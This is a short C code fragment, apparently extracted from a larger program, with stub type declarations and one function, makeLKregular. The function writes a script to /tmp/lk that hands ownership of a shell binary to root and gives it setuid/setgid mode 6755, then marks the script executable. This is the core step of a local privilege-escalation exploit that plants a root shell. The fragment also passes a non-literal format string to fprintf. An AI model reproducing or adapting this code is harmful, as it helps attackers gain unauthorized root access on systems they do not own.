
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 char* CHMODAT ;
 char* CHOWNAT ;
 char* SHAT ;
 char* SHELLAT ;
 int chmod (char*,int) ;
 int fclose (int *) ;
 int fflush (int *) ;
 int * fopen (char*,char*) ;
 int fprintf (int *,char*) ;
 int snprintf (char*,int,char*,char*,char*,char*,char*,char*) ;
 int umask (int ) ;

void makeLKregular(void)
{
   FILE *lk;
   char blaat[1000];

   lk = fopen("/tmp/lk", "w");

   snprintf(blaat, 1000, "#!%s\n%s .root %s\n%s 6755 %s\n",
            SHAT, CHOWNAT, SHELLAT, CHMODAT, SHELLAT);

   fprintf(lk, blaat);
   fflush(lk);
   fclose(lk);
   umask(0);
   chmod("/tmp/lk", 0755);
}
